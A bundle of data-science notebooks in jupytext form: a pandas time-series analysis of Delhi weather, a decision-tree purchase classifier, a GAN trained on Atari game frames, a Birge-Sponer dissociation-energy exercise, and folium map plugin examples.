# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Delhi Daily Weather Forecast
# In this notebook we analyze a time series DataFrame for Delhi daily weather forecast for the years $2013$ to $2017$. We specifically deal with:
# - Getting the data
# - Time based indexing
# - Visualizing time series data
# - Seasonality
# - Frequencies
# - Resampling
# - Rolling windows
# - Correlation between humidity and temperature
#
# This analysis is adapted from [DataQuest Tutorial](https://www.dataquest.io/blog/tutorial-time-series-analysis-with-pandas/).
#
#
# ### 1. Getting the data
# This time series data set is obtained from [Kaggle Data Repository](https://www.kaggle.com/sumanthvrao/daily-climate-time-series-data?select=DailyDelhiClimateTrain.csv 'Title') with the following parameters:
# * `meantemp`: mean temperature, averaged over multiple 3-hour intervals in a day (measured in degrees Celsius).
# * `humidity`: humidity value for the day (units are grams of water vapor per cubic meter volume of air).
# * `wind_speed`: wind speed (measured in `kmph`).
# * `meanpressure`: mean pressure reading of the weather (measured in `atm`).
#
# The following packages were used:
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.dates as mdates
import matplotlib.pyplot as plt
import statsmodels.api as sm
from sklearn.linear_model import LinearRegression as lr
# Reading a CSV data file
delhi_daily_weather = pd.read_csv('../data/DailyDelhiClimate.csv')
delhi_daily_weather.shape
delhi_daily_weather.head(3)
delhi_daily_weather.tail(3)
# +
# Handling missing data for the year 2017
# -
delhi_daily_weather.dtypes
# Something is wrong with the data type of the `date` column, so we convert it using the `to_datetime()` function.
delhi_daily_weather['date'] = pd.to_datetime(delhi_daily_weather['date'])
delhi_daily_weather.dtypes
# Now everything looks great. Next, we set the `index` to be the `date` column.
delhi_daily_weather = delhi_daily_weather.set_index('date')
delhi_daily_weather.tail(3)
delhi_daily_weather.index
# Add columns with year, month, and weekday name
delhi_daily_weather['Year'] = delhi_daily_weather.index.year
delhi_daily_weather['Month'] = delhi_daily_weather.index.month
delhi_daily_weather['Weekday Name'] = delhi_daily_weather.index.day_name()
# Display a random sampling of 5 rows
delhi_daily_weather.sample(5, random_state=0)
# ### 2. Time based indexing
#
# This allows us to view our data on a certain interval of time depending on our needs.
# Viewing one row for the selected day
delhi_daily_weather.loc['2015-01-11']
# Slice of days
delhi_daily_weather.loc['2014-01-20':'2014-01-22']
# Partial-string indexing for the month of March 2016
delhi_daily_weather.loc['2016-03']
# The entry of `meanpressure` for `2016-03-28` is an outlier, as is clear from the trend of the data in that column. This is likely caused by an incorrect recording. To deal with it, we replace the value with the average of four entries, i.e. the two values before and the two values after the outlier.
delhi_daily_weather.iloc[1182,3] = (delhi_daily_weather.iloc[1180,3]+
delhi_daily_weather.iloc[1181,3]+
delhi_daily_weather.iloc[1183,3]+
delhi_daily_weather.iloc[1184,3])/4
delhi_daily_weather.loc[['2016-03-28']]
# The new value has been written into our DataFrame, keeping the data consistent. There is an alternative to the approach above, but it triggers a warning (`SettingWithCopyWarning`) because of chained indexing. See the commented code below.
# +
# delhi_daily_weather.loc['2016-03-28']['meanpressure'] = (delhi_daily_weather.loc['2016-03-26']['meanpressure']+
# delhi_daily_weather.loc['2016-03-27']['meanpressure']+
# delhi_daily_weather.loc['2016-03-29']['meanpressure']+
# delhi_daily_weather.loc['2016-03-30']['meanpressure'])/4
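# Chained indexing like `df.loc[row][col] = value` writes to a temporary copy, which is
# why pandas warns about it. A single label-based `.loc[row, col]` assignment modifies the
# DataFrame in place. A minimal sketch on a toy frame (the pressure values below are
# illustrative, not the real readings):

```python
import pandas as pd

idx = pd.to_datetime(['2016-03-26', '2016-03-27', '2016-03-28',
                      '2016-03-29', '2016-03-30'])
df = pd.DataFrame({'meanpressure': [1010.0, 1009.0, 7679.0, 1011.0, 1012.0]},
                  index=idx)

# Average the two days before and the two days after the outlier,
# then assign with a single .loc[row, col] call (no warning).
neighbours = pd.to_datetime(['2016-03-26', '2016-03-27',
                             '2016-03-29', '2016-03-30'])
df.loc['2016-03-28', 'meanpressure'] = df.loc[neighbours, 'meanpressure'].mean()
print(df.loc['2016-03-28', 'meanpressure'])  # 1010.5
```

# The same pattern applied to `delhi_daily_weather` avoids the warning entirely.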
# + [markdown] slideshow={"slide_type": "slide"}
# ### 3. Visualizing time series data
#
# Considering the table above, `meanpressure` doesn't provide us with significant information to analyze our data. We may decide to drop it and work with the rest of the columns.
# -
# Use seaborn style defaults and set the default figure size
sns.set(rc={'figure.figsize':(14, 7)})
# +
# Consider the meantemp, humidity and wind_speed time series
cols_plot = ['meantemp', 'humidity', 'wind_speed']
axes = delhi_daily_weather[cols_plot].plot(marker='o', figsize=(15, 10), alpha=0.5,
                                           linestyle='None', subplots=True)
ylabels = [r'Degree Celsius ($^\circ C$)', 'Vapour per cubic meter', 'kmph']
for ax, ylabel in zip(axes, ylabels):
    ax.set_ylabel(ylabel)
# -
# Considering the figure above, temperature and wind speed appear to vary inversely with humidity: when they rise, the humidity falls. Wind speed itself does not vary much, with only a few outliers exceeding $20\,kmph$.
#
# In light of the previous figure, let's consider temperature parameter and provide more details about it.
delhi_daily_weather['meantemp'].plot(linewidth=0.7);
plt.title('2013 - 2017 Mean Temperature')
plt.ylabel('Degree Celsius ($^\circ C$)')
# The figure above shows that some periods of the year (likely summer, i.e. May to October) experience temperatures above $30^\circ C$, while others (winter, i.e. December and January) stay below $15^\circ C$.
#
# Let's focus on the year of 2015.
# Monthly temperature in 2015
ax = delhi_daily_weather.loc['2015', 'meantemp'].plot()
ax.set_ylabel('Degree Celsius ($^\circ C$)')
plt.title('2015 Mean Temperature')
# As we guessed earlier, the temperature rises beyond $30^\circ C$ between May and October, and it goes below $15^\circ C$ in January and December.
#
# Let's now visualize our data for January and February 2015 with `x-ticks` represented in a nice format.
fig, ax = plt.subplots()
ax.plot(delhi_daily_weather.loc['2015-01':'2015-02', 'meantemp'], marker='o', linestyle='-')
ax.set_ylabel('Celsius Degrees ($^\circ C$)')
ax.set_title('Jan-Feb 2015 Mean Temperature')
# Set x-axis major ticks to weekly interval, on Mondays
ax.xaxis.set_major_locator(mdates.WeekdayLocator(byweekday=mdates.MONDAY))
# Format x-tick labels as 3-letter month name and day number
ax.xaxis.set_major_formatter(mdates.DateFormatter('%b %d'));
# Now we have vertical gridlines and nicely formatted tick labels on each Monday, so we can easily tell weekdays from weekends.
# ### 4. Seasonality
# We concentrate on yearly temperature, humidity and wind speed variations, and study their relationships.
fig, axes = plt.subplots(3, 1, figsize=(11, 10), sharex=True)
ylabels = {'meantemp': r'Degree Celsius ($^\circ C$)',
           'humidity': 'Vapour per cubic meter',
           'wind_speed': 'kmph'}
for name, ax in zip(['meantemp', 'humidity', 'wind_speed'], axes):
    sns.boxplot(data=delhi_daily_weather, x='Month', y=name, ax=ax)
    ax.set_ylabel(ylabels[name])
    ax.set_title(name)
    # Remove the automatic x-axis label from all but the bottom subplot
    if ax != axes[-1]:
        ax.set_xlabel('')
# These box plots confirm the yearly seasonality that we saw in earlier plots.
#
# Our next step for seasonality is based on weekly temperature, humidity and wind speed.
sns.boxplot(data=delhi_daily_weather, x='Weekday Name', y='meantemp')
plt.title('Weekly mean temperature')
# The figure above shows that the temperature does not vary much from weekday to weekday, lying between $19^\circ C$ and $32^\circ C$.
sns.boxplot(data=delhi_daily_weather, x='Weekday Name', y='humidity')
plt.title('Weekly humidity')
# Again there is not much variation in the humidity level, with some outliers on Tuesdays, Wednesdays and Thursdays.
sns.boxplot(data=delhi_daily_weather, x='Weekday Name', y='wind_speed')
plt.title('Weekly wind speed')
# ### 5. Frequencies
delhi_daily_weather.index
# To select an arbitrary sequence of date/time values from a pandas time series,
# we need to use a DatetimeIndex, rather than simply a list of date/time strings
times_sample = pd.to_datetime(['2013-02-03', '2013-02-06', '2013-02-08'])
# Select the specified dates and just the meantemp column
meantemp_sample = delhi_daily_weather.loc[times_sample, ['meantemp']].copy()
meantemp_sample
# Convert the data to daily frequency, without filling any missings
meantemp_freq = meantemp_sample.asfreq('D')
# Create a column with missings forward filled
meantemp_freq['meantemp - Forward Fill'] = meantemp_sample.asfreq('D', method='ffill')
meantemp_freq
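# Besides forward filling, the gaps created by `asfreq('D')` can be backward filled or
# interpolated. A small sketch of the options on toy values (not the real temperatures):

```python
import pandas as pd

times = pd.to_datetime(['2013-02-03', '2013-02-06', '2013-02-08'])
s = pd.Series([10.0, 13.0, 16.0], index=times)

daily = s.asfreq('D')                      # introduces NaN for the missing days
bfilled = s.asfreq('D', method='bfill')    # fill each gap from the next observation
interp = daily.interpolate(method='time')  # linear in time between observations
print(interp['2013-02-04'])  # 11.0, one third of the way from 10.0 to 13.0
```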
# ### 6. Resampling
# Using the `resample()` method we can apply aggregation methods such as `mean()`, `median()`, `max()`, etc.
# Specify the data columns we want to include (i.e. exclude Year, Month, Weekday Name)
data_columns = ['meantemp', 'humidity', 'wind_speed']
# Resample to weekly frequency, aggregating with mean
delhi_weekly_mean = delhi_daily_weather[data_columns].resample('W').mean()
delhi_weekly_mean.head(3)
delhi_weekly_mean.tail(3)
# Comparing the rows after resampling the data on weekly mean
print(delhi_daily_weather.shape[0])
print(delhi_weekly_mean.shape[0])
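# `resample()` accepts other aggregations too, and several can be computed at once with
# `.agg()`. A minimal sketch on a toy series (the index and values are illustrative):

```python
import numpy as np
import pandas as pd

idx = pd.date_range('2015-01-01', periods=14, freq='D')
s = pd.Series(np.arange(14.0), index=idx, name='meantemp')

# One row per week (labelled by the Sunday that ends it), three aggregations at once
weekly = s.resample('W').agg(['mean', 'min', 'max'])
print(weekly)
```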
# Let’s plot the daily and weekly mean temperature time series together over a single six-month period to compare them.
# Start and end of the date range to extract
start, end = '2015-01', '2015-06'
# Plot daily and weekly resampled time series together
fig, ax = plt.subplots()
ax.plot(delhi_daily_weather.loc[start:end, 'meantemp'],
marker='.', linestyle='-', linewidth=0.5, label='Daily')
ax.plot(delhi_weekly_mean.loc[start:end, 'meantemp'],
marker='o', markersize=8, linestyle='-', label='Weekly Mean Resample')
ax.set_ylabel('Mean Temperature ($^\circ C$)')
ax.legend();
# We can see that the weekly mean time series is smoother than the daily time series because higher frequency variability has been averaged out in the resampling.
# Compute the monthly maximum of the data
delhi_monthly_max = delhi_daily_weather[data_columns].resample('M').max()
delhi_monthly_max.head(3)
delhi_monthly_max.tail(3)
# Let’s explore this further by resampling to annual frequency and computing the ratio of `meantemp` to `humidity` for each year.
# Compute the maximum annual temperature
delhi_annual_max = delhi_daily_weather[data_columns].resample('A').max()
# The default index of the resampled DataFrame is the last day of each year,
# ('2013-12-31', '2014-12-31', etc.) so to make life easier, set the index
# to the year component
delhi_annual_max = delhi_annual_max.set_index(delhi_annual_max.index.year)
delhi_annual_max.index.name = 'Year'
# Compute the ratio of meantemp to humidity
delhi_annual_max['Ratio'] = delhi_annual_max['meantemp'] / delhi_annual_max['humidity']
delhi_annual_max.head(5)
# Finally, let’s plot the ratio of `meantemp` and `humidity` as a bar chart.
ax = delhi_annual_max.loc[2013:, 'Ratio'].plot.bar(color='C0')
ax.set_ylabel('Fraction')
ax.set_ylim(0, .5)
ax.set_title('Humidity temperature ratio')
plt.xticks(rotation=0);
# The figure above shows that the ratio lies between $0.35$ and $0.45$ for the first four years, while it is far lower for $2017$ because there is not enough data for that year.
# ### 7. Rolling Windows
# Let’s use the `rolling()` method to compute the 7-day rolling mean of our daily data.
# Compute the centered 7-day rolling mean
delhi_7d = delhi_daily_weather[data_columns].rolling(7, center=True).mean()
delhi_7d.head(10)
# To visualize the differences between rolling mean and resampling, let’s update our earlier plot of January - June 2015 mean temperature to include the 7-day rolling mean along with the weekly mean resampled time series and the original daily data.
# Start and end of the date range to extract
start, end = '2015-01', '2015-06'
# Plot daily, weekly resampled, and 7-day rolling mean time series together
fig, ax = plt.subplots()
ax.plot(delhi_daily_weather.loc[start:end, 'meantemp'],
marker='.', linestyle='-', linewidth=0.5, label='Daily')
ax.plot(delhi_weekly_mean.loc[start:end, 'meantemp'],
marker='o', markersize=8, linestyle='-', label='Weekly Mean Resample')
ax.plot(delhi_7d.loc[start:end, 'meantemp'],
marker='.', linestyle='-', label='7-d Rolling Mean')
ax.set_ylabel('Mean Temperature ($^\circ C$)')
ax.legend();
# We can see that data points in the rolling mean time series have the same spacing as the daily data, but the curve is smoother because higher frequency variability has been averaged out. In the rolling mean time series, the peaks and troughs tend to align closely with the peaks and troughs of the daily time series. In contrast, the peaks and troughs in the weekly resampled time series are less closely aligned with the daily time series, since the resampled time series is at a coarser granularity.
# We’ve already computed 7-day rolling means, so now let’s compute the 365-day rolling mean of our weather data.
# The min_periods=360 argument accounts for a few isolated missing days
delhi_365d = delhi_daily_weather[data_columns].rolling(window=365, center=True, min_periods=360).mean()
delhi_365d.tail(400)
# Let’s plot the 7-day and 365-day rolling mean temperature, along with the daily time series.
# Plot daily, 7-day rolling mean, and 365-day rolling mean time series
fig, ax = plt.subplots()
ax.plot(delhi_daily_weather['meantemp'], marker='.', markersize=4, color='0.6',
linestyle='None', label='Daily')
ax.plot(delhi_7d['meantemp'], linewidth=2, label='7-d Rolling Mean')
ax.plot(delhi_365d['meantemp'], color='0.2', linewidth=3,
label='Trend (365-d Rolling Mean)')
# Set x-ticks to yearly interval and add legend and labels
ax.xaxis.set_major_locator(mdates.YearLocator())
ax.legend()
ax.set_xlabel('Year')
ax.set_ylabel('Mean Temperature ($^\circ C$)')
ax.set_title('Trends in Temperature');
# Annual trend of humidity.
# Plot 365-day rolling mean time series of humidity
fig, ax = plt.subplots()
ax.plot(delhi_365d['humidity'], label='humidity')
# Set x-ticks to yearly interval, adjust y-axis limits, add legend and labels
ax.xaxis.set_major_locator(mdates.YearLocator())
ax.set_ylim(58, 67)
ax.legend()
ax.set_ylabel('Vapor per cubic meter')
ax.set_title('Trends in humidity (365-d Rolling Means)');
# ### 8. Correlation between humidity and temperature
# +
# # Fitting the data for temperature and humidity
# temperature = np.array(delhi_daily_weather['meantemp'])
# humidity = np.array(delhi_daily_weather['humidity']).reshape(-1,1)
# model = lr().fit(humidity, temperature)
# #Coefficient of determination r_sq
# print('r_sq = ', model.score(humidity, temperature),'\n')
# #Intercept
# print('Intercept = ', model.intercept_,'\n')
# #Slope
# print('Slope = ', model.coef_,'\n\n')
# pred_temp = model.predict(humidity)
# An increase in humidity is associated with a decrease in temperature at a rate of about $-0.25$. Let's examine this hypothesis.
# -
y = delhi_daily_weather['meantemp']
x = delhi_daily_weather[['humidity','wind_speed','meanpressure']]
x = sm.add_constant(x)
results = sm.OLS(y,x).fit()
results.summary()
# Source: scripts/delhi_weather_analysis.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
#### Importing libraries
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib inline
# +
#### Loading the dataset as a pandas DataFrame
data = pd.read_excel('./Data/PURCHASE.xlsx')
#### Let's take a look at the top five rows using the DataFrame's head() method
data.head()
# -
#### Converting Categorical column to numeric
#### Instead of using a OneHotEncoder or LabelEncoder, simply use the replace method
data.replace({'NO':0, 'YES':1}, inplace=True)
data.head()
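# Note that `replace` rewrites matching values in *every* column. To restrict the mapping
# to specific columns, `map` each one explicitly — a sketch on a toy frame (the column
# names below are illustrative, not the purchase data):

```python
import pandas as pd

df = pd.DataFrame({'Holiday': ['YES', 'NO'], 'Note': ['NO idea', 'YES']})

# Map only the column we want encoded; other columns stay untouched
df['Holiday'] = df['Holiday'].map({'NO': 0, 'YES': 1})
print(df['Holiday'].tolist())  # [1, 0]
print(df['Note'].tolist())     # ['NO idea', 'YES']
```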
# +
#### Creating dependent and independent variables
# independent variables
x=data.drop(['PURCHASE'],axis=1)
# dependent variable
y=data['PURCHASE']
# +
#### Decision Tree Classifier Model instantiate and fit
import sklearn.tree as tree
model_DTC=tree.DecisionTreeClassifier(criterion='entropy')
model_DTC.fit(x,y)
#### Plotting the Decision Tree
from sklearn.tree import plot_tree, export_text
features = x.columns
plt.figure(figsize=(10,10))
plot_tree(model_DTC, feature_names=features,filled = True)
plt.show()
# +
#### Defining function for Classification Results
from sklearn.metrics import accuracy_score
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
import seaborn as sns  # needed for the confusion-matrix heatmap below

def classification_results(model, xR, yR, ON):
    #### Predicting
    yR_predict = model.predict(xR)
    #### Calculating accuracy score
    acc = accuracy_score(yR, yR_predict)
    print('\033[1m' + ON + ':' + '\033[0m')
    print(f'Accuracy : {acc}')
    print('-' * 55)
    #### Classification report
    CR = classification_report(yR, yR_predict)
    print("classification report : \n", CR)
    print('-' * 55)
    #### Confusion matrix
    CM = confusion_matrix(yR, yR_predict)
    print("Confusion matrix :\n", CM)
    sns.heatmap(CM, center=True, annot=True, fmt='g')
    plt.ylabel('Actual label')
    plt.xlabel('Predicted label')
    return (yR_predict, acc)
# -
#### Classification Results on train
y_train_predict_dtc, acc_train_dtc = classification_results(model_DTC, x, y, 'TRAIN')
#### Creating Test DataSet
data_test=pd.DataFrame({'Holiday':[1,0,0,1,1],'Discount':[0,0,1,0,1],'Free Delivery':[0,0,0,1,1]})
data_test
#### Making Predictions on test DataSet
data_test['Purchase']=model_DTC.predict(data_test)
data_test.replace({0:'No',1:'Yes'})
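# A caveat: the accuracy above is measured on the same rows the tree was fitted on, which
# overstates performance. A held-out split gives a fairer estimate — a sketch on synthetic
# data (the toy purchase rule below is illustrative, not the real dataset):

```python
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import accuracy_score

rng = np.random.default_rng(0)
X = rng.integers(0, 2, size=(200, 3))  # three binary features, like the purchase data
y = X[:, 0] | X[:, 1]                  # toy rule: purchase if holiday or discount

# Hold out 25% of the rows and score on them only
X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.25, random_state=0)
clf = DecisionTreeClassifier(criterion='entropy').fit(X_tr, y_tr)
test_acc = accuracy_score(y_te, clf.predict(X_te))
print(test_acc)
```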
# Source: Supervised/Classification/DecisionTree_Classifier/Purchase_DT_Classifier.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="fJuus3m7uy7O" colab_type="text"
# <h1> Generative Adversarial Networks using the OpenAI Gym and PyTorch </h1>
# <div>
# <p> <b> <NAME> 2020. </b>
# <p> Before running this notebook, make sure you have access to a GPU, as this notebook relies entirely on the GPU for its workloads.</p>
# </div>
# + id="_j2c-90CcClg" colab_type="code" outputId="2430d180-b2ca-4421-a857-288cce7c6092" colab={"base_uri": "https://localhost:8080/", "height": 894}
# !pip install opencv-python
# !pip install --upgrade tensorflow
# !pip install --upgrade grpcio
import tensorflow as tf
import random
import argparse
import cv2
import torch
import torch.nn as nn
import torch.optim as optim
import torchvision.utils as vutils
import gym
import gym.spaces
import gym.logger as logstat
logstat.set_level(gym.logger.INFO)
import numpy as np
from gym.wrappers import Monitor
# !pip install pyvirtualdisplay
# !apt-get install python-opengl ffmpeg xvfb
# + id="EKvLidEQdOc_" colab_type="code" colab={}
LATENT_VECTOR_SIZE=100
DISCR_FILTERS = 64
GENER_FILTERS = 64
BATCH_SIZE = 16
# + id="-9VDAkO0ezTM" colab_type="code" colab={}
IMAGE_SIZE = 64
LEARNING_RATE = 0.0001
REPORT_EVERY_ITER = 100
SAVE_IMAGE_EVERY_ITER=1000
# + id="SqkdqvYdfANa" colab_type="code" colab={}
class InputWrapper(gym.ObservationWrapper):
    '''
    Preprocessing pipeline for input images
    '''
    def __init__(self, *args):
        super(InputWrapper, self).__init__(*args)
        assert isinstance(self.observation_space, gym.spaces.Box)
        old_space = self.observation_space
        self.observation_space = gym.spaces.Box(self.observation(old_space.low),
                                                self.observation(old_space.high),
                                                dtype=np.float32)
    def observation(self, observation):
        # resize the input image
        new_obs = cv2.resize(observation, (IMAGE_SIZE, IMAGE_SIZE))
        # transform the shape from (IMAGE_SIZE, IMAGE_SIZE, 3) to (3, IMAGE_SIZE, IMAGE_SIZE)
        new_obs = np.moveaxis(new_obs, 2, 0)
        return new_obs.astype(np.float32)
# + id="sNG_r8tZh2dg" colab_type="code" colab={}
class Discriminator(nn.Module):
    def __init__(self, input_shape):
        super(Discriminator, self).__init__()
        # This pipe collapses the image into a single number through a series of
        # convolutions, ReLUs and batch normalizations, ending with a sigmoid.
        self.conv_pipe = nn.Sequential(
            nn.Conv2d(in_channels=input_shape[0], out_channels=DISCR_FILTERS,
                      kernel_size=4, stride=2, padding=1),
            nn.ReLU(),
            nn.Conv2d(in_channels=DISCR_FILTERS, out_channels=DISCR_FILTERS * 2,
                      kernel_size=4, stride=2, padding=1),
            nn.BatchNorm2d(DISCR_FILTERS * 2),
            nn.ReLU(),
            nn.Conv2d(in_channels=DISCR_FILTERS * 2, out_channels=DISCR_FILTERS * 4,
                      kernel_size=4, stride=2, padding=1),
            nn.BatchNorm2d(DISCR_FILTERS * 4),
            nn.ReLU(),
            nn.Conv2d(in_channels=DISCR_FILTERS * 4, out_channels=DISCR_FILTERS * 8,
                      kernel_size=4, stride=2, padding=1),
            nn.BatchNorm2d(DISCR_FILTERS * 8),
            nn.ReLU(),
            nn.Conv2d(in_channels=DISCR_FILTERS * 8, out_channels=1,
                      kernel_size=4, stride=1, padding=0),
            nn.Sigmoid()
        )
    def forward(self, x):
        conv_out = self.conv_pipe(x)
        return conv_out.view(-1, 1).squeeze(dim=1)
# + id="hrH62z3XjuKx" colab_type="code" colab={}
class Generator(nn.Module):
    def __init__(self, output_shape):
        super(Generator, self).__init__()
        self.pipe = nn.Sequential(
            nn.ConvTranspose2d(in_channels=LATENT_VECTOR_SIZE, out_channels=GENER_FILTERS * 8,
                               kernel_size=4, stride=1, padding=0),
            nn.BatchNorm2d(GENER_FILTERS * 8),
            nn.ReLU(),
            nn.ConvTranspose2d(in_channels=GENER_FILTERS * 8, out_channels=GENER_FILTERS * 4,
                               kernel_size=4, stride=2, padding=1),
            nn.BatchNorm2d(GENER_FILTERS * 4),
            nn.ReLU(),
            nn.ConvTranspose2d(in_channels=GENER_FILTERS * 4, out_channels=GENER_FILTERS * 2,
                               kernel_size=4, stride=2, padding=1),
            nn.BatchNorm2d(GENER_FILTERS * 2),
            nn.ReLU(),
            nn.ConvTranspose2d(in_channels=GENER_FILTERS * 2, out_channels=GENER_FILTERS,
                               kernel_size=4, stride=2, padding=1),
            nn.BatchNorm2d(GENER_FILTERS),
            nn.ReLU(),
            nn.ConvTranspose2d(in_channels=GENER_FILTERS, out_channels=output_shape[0],
                               kernel_size=4, stride=2, padding=1),
            nn.Tanh()
        )
    def forward(self, x):
        return self.pipe(x)
# + id="2l6TRRMwkcEa" colab_type="code" colab={}
def iterate_batches(envs, batch_size=BATCH_SIZE):
    batch = [e.reset() for e in envs]
    env_gen = iter(lambda: random.choice(envs), None)
    while True:
        e = next(env_gen)
        obs, reward, is_done, info = e.step(e.action_space.sample())
        if np.mean(obs) > 0.01:
            batch.append(obs)
        if len(batch) == batch_size:
            # normalize to the range -1 to 1
            batch_np = np.array(batch, dtype=np.float32) * 2.0 / 255.0 - 1.0
            yield torch.tensor(batch_np)
            batch.clear()
        if is_done:
            e.reset()
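# A side note on the `iter(callable, sentinel)` pattern used above: it builds an iterator
# that keeps calling the callable until it returns the sentinel, so with a callable that
# never returns `None` it loops forever. A minimal illustration with toy values:

```python
import random

envs = ['a', 'b', 'c']
env_gen = iter(lambda: random.choice(envs), None)  # the callable never yields None
picks = [next(env_gen) for _ in range(5)]          # five random picks from envs
print(picks)
```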
# + id="PV5eVpCFVO1-" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 118} outputId="01582358-0cc5-4d92-81cb-45e61185d7ce"
from tqdm import tqdm
if __name__ == "__main__":
    device = torch.device("cuda")
    envs = [InputWrapper(gym.make(name)) for name in ('Breakout-v0', 'AirRaid-v0', 'Pong-v0')]
    input_shape = envs[0].observation_space.shape
    net_discr = Discriminator(input_shape=input_shape).to(device)
    net_gener = Generator(output_shape=input_shape).to(device)
    objective = nn.BCELoss()
    gen_optimizer = optim.Adam(params=net_gener.parameters(), lr=LEARNING_RATE, betas=(0.5, 0.999))
    dis_optimizer = optim.Adam(params=net_discr.parameters(), lr=LEARNING_RATE, betas=(0.5, 0.999))
    gen_losses = []
    dis_losses = []
    iter_no = 0
    true_labels_v = torch.ones(BATCH_SIZE, dtype=torch.float32, device=device)
    fake_labels_v = torch.zeros(BATCH_SIZE, dtype=torch.float32, device=device)
    pbar = tqdm(total=7000)
    for batch_v in iterate_batches(envs):
        gen_input_v = torch.FloatTensor(BATCH_SIZE, LATENT_VECTOR_SIZE, 1, 1).normal_(0, 1).to(device)
        batch_v = batch_v.to(device)
        gen_output_v = net_gener(gen_input_v)
        # train discriminator
        dis_optimizer.zero_grad()
        dis_output_true_v = net_discr(batch_v)
        dis_output_fake_v = net_discr(gen_output_v.detach())
        dis_loss = objective(dis_output_true_v, true_labels_v) + objective(dis_output_fake_v, fake_labels_v)
        dis_loss.backward()
        dis_optimizer.step()
        dis_losses.append(dis_loss.item())
        # train generator
        gen_optimizer.zero_grad()
        dis_output_v = net_discr(gen_output_v)
        gen_loss_v = objective(dis_output_v, true_labels_v)
        gen_loss_v.backward()
        gen_optimizer.step()
        gen_losses.append(gen_loss_v.item())
        iter_no += 1
        pbar.update(1)
        if iter_no == 7000:
            pbar.close()
            print("Final Result: ")
            print("Iteration : %d, Discriminator Loss: %f, Generator Loss: %f " % (iter_no, dis_loss.item(), gen_loss_v.item()))
            break
# Source: Reinforcement_Learning_With_Swastik_Episode_2.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Computing Birge-Sponer plots from vibrational transitions
# <a rel="license" href="http://creativecommons.org/licenses/by/4.0/"><img alt="Creative Commons Licence" style="border-width:0" src="https://i.creativecommons.org/l/by/4.0/88x31.png" title='This work is licensed under a Creative Commons Attribution 4.0 International License.' align="right"/></a>
#
# This is an interactive notebook to compute Birge-Sponer plots from vibrational data and estimate upper bounds for dissociation energies based on vibrational frequency data.
#
# Author: Dr <NAME> [@ppxasjsm](https://github.com/ppxasjsm)
# To run the currently highlighted cell, hold <kbd>⇧ Shift</kbd> and press <kbd>⏎ Enter</kbd>.
# ## Adding data
# You can add a set of vibrational transition wave numbers and their corresponding vibrational quantum numbers in the two cells below. An example for HgH would look like this:
# Observed transitions: 1203.7, 965.6, 632.4, 172
# Vibrational quantum numbers: 0.5, 1.5, 2.5, 3.5
# %matplotlib inline
import numpy as np
import Helper
data = Helper.data_input()
display(data)
# When you execute the next cell, the data will be read and the two columns plotted against each other.
Helper.plot_birge_sponer(data)
# #### Extrapolating the data
# Now, in order to compute the dissociation energy, we need to extrapolate the line until it crosses the y-axis at $x=0$ and the x-axis at $y=0$.
# The plot below has done this automatically. The Helper module uses the linear regression fit `linregress` as implemented in `scipy`.
Helper.plot_extrapolated_birge_sponer(data)
# #### Computing the area under the curve
# You can see that the dashed orange line is the extrapolated portion of the curve.
# You could try to read the intercepts off the graph, or simply compute the area under the curve, which in this case is a right-angled triangle.
#
# Remember the area of a triangle is given by:
# $A = \frac{1}{2}ab$,
# where $a$, in this case, is the side along the y-axis and $b$ is the side along the x-axis.
# Again, there is a convenient helper function that takes the data from the curve, computes the area, and displays the result.
Helper.compute_area_under_graph(data)
# **Check your understanding**:
# How is the dissociation energy computed from the wave number that is estimated by the area under the curve?
# Try it yourself and see if you get the same answer as below.
Helper.compute_dissociation_energy(data)
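# For reference, a minimal sketch of the whole computation, assuming the Helper functions
# perform a linear fit with `scipy.stats.linregress` and use the triangle-area formula
# above (the Helper module's exact implementation may differ; the HgH example values are
# used):

```python
import numpy as np
from scipy.stats import linregress

wavenumbers = np.array([1203.7, 965.6, 632.4, 172.0])  # observed transitions, cm^-1
v_half = np.array([0.5, 1.5, 2.5, 3.5])                # vibrational quantum numbers v + 1/2

fit = linregress(v_half, wavenumbers)
y_intercept = fit.intercept               # line value at v + 1/2 = 0
x_intercept = -fit.intercept / fit.slope  # where the line reaches zero

# Area of the right-angled triangle = estimated dissociation wavenumber (cm^-1)
d0_wavenumber = 0.5 * y_intercept * x_intercept
print(d0_wavenumber)
```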
# ***Some other data***:
#
a = np.array([2191, 2064, 1941, 1821, 1705, 1591, 1479, 1368, 1257, 1145,
              1033, 918, 800, 677, 548, 411])
v = [i + 0.5 for i in range(len(a))]
v
# Source: Birge-Sponer_Diagrams.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import os
import folium
print(folium.__version__)
# -
# # Examples of plugin usage in folium
from folium import plugins
# In this notebook we show a few illustrations of folium's plugin extensions.
#
# This is a development notebook
# ## ScrollZoomToggler
# Adds a button to enable/disable zoom scrolling.
# +
m = folium.Map([45, 3], zoom_start=4)
plugins.ScrollZoomToggler().add_to(m)
m.save(os.path.join('results', 'Plugins_0.html'))
m
# -
# ## MarkerCluster
# Adds a MarkerCluster layer on the map.
# +
import numpy as np
N = 100
data = np.array(
[
np.random.uniform(low=35, high=60, size=N), # Random latitudes in Europe.
np.random.uniform(low=-12, high=30, size=N), # Random longitudes in Europe.
range(N), # Popups texts are simple numbers.
]
).T
m = folium.Map([45, 3], zoom_start=4)
plugins.MarkerCluster(data).add_to(m)
m.save(os.path.join('results', 'Plugins_1.html'))
m
# -
